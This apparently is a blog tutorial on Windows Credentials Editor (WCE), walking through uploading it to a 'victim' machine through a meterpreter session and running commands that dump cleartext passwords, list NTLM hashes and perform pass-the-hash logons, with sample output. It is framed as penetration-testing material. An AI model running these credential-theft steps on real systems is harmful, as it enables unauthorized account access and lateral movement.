Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).
The tool allows users to:
The tool allows users to:
- Perform Pass-the-Hash on Windows
- 'Steal' NTLM credentials from memory (with and without code injection)
- 'Steal' Kerberos Tickets from Windows machines
- Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
- Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hack remote computer upload wce to victim computer using metasploit
(1)Type following command in meterpreter session.
Upload /pentest/passwords/wce/wce.exe .(2)Now type shellto get cmd of victim pc
(3)Type wce.exe -wto get password in clear text
List NTLM credentials in memory?
By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe
How to Change my current NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!
How to Create a new logon session and launch a program with new NTLM credentials?
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe
How to generate NTLM hashes with WCE?
wce.exe -g <cleartext password>For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7
If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2
If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.
No comments:
Post a Comment